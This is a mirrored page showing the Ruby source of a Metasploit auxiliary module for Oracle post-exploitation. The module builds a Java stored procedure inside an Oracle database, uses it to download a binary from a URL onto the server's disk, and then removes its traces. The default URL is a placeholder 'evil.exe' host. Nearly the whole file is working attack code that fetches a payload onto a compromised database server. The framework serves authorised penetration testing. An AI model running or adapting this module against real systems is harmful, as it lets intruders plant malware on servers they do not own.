Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle URL Download',

14
        'Description' => %q{

15
          This module will create a Java class which enables the download

16
          of a binary from a webserver to the Oracle filesystem.

17
        },

18
        'Author' => [ 'CG' ],

19
        'License' => MSF_LICENSE,

20
        'References' => [

21
          [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],

22
        ],

23
        'DisclosureDate' => '2005-02-10',

24
        'Notes' => {

25
          'Stability' => [CRASH_SAFE],

26
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

27
          'Reliability' => []

28
        }

29
      )

30
    )

31


32
    register_options(

33
      [

34
        OptString.new('URL', [false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),

35
        OptString.new('COPYTO', [false, 'Location to copy the binary to', 'c:\\meh.exe']),

36
      ]

37
    )

38
  end

39


40
  def run

41
    return if !check_dependencies

42


43
    java = <<~EOF

44
      CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS

45
      import java.lang.*;

46
      import java.io.*;

47
      public class FileUpload

48
      {

49
        public static void fileUpload(String myFile, String url) throws IOException

50
        {

51
          File binaryFile = new File(myFile);

52
          FileOutputStream outStream = new  FileOutputStream(binaryFile);

53
          java.net.URL u = new java.net.URL(url);

54
          java.net.URLConnection uc = u.openConnection();

55
          InputStream is = (InputStream)uc.getInputStream();

56
          BufferedReader in = new BufferedReader (new InputStreamReader (is));

57
          byte buffer[] = new byte[1024];

58
          int length = -1;

59
          while ((length = is.read(buffer)) != -1) {

60
            outStream.write(buffer, 0, length);

61
            outStream.flush();

62
          }

63
          is.close(); outStream.close();

64
        }

65
      };;

66
    EOF

67


68
    procedure = <<~EOF

69
      CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2)

70
      as language java

71
      NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';

72
    EOF

73


74
    exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"

75


76
    drops = 'drop java source SRC_FILE_UPLOAD'

77


78
    dropp = 'drop procedure PROC_FILEUPLOAD'

79


80
    begin

81
      print_status("Creating java source 'SRC_FILE_UPLOAD'...")

82
      prepare_exec(java)

83
    rescue StandardError

84
      return

85
    end

86


87
    print_status("Creating procedure 'PROC_FILEUPLOAD'...")

88
    prepare_exec(procedure)

89


90
    print_status("Trying to download binary from #{datastore['URL']} to #{datastore['COPYTO']}")

91
    prepare_exec(exec)

92


93
    print_status("Removing java source 'SRC_FILE_UPLOAD'...")

94
    prepare_exec(drops)

95


96
    print_status("Removing procedure 'PROC_FILEUPLOAD'...")

97
    prepare_exec(dropp)

98
  end

99
end

100


101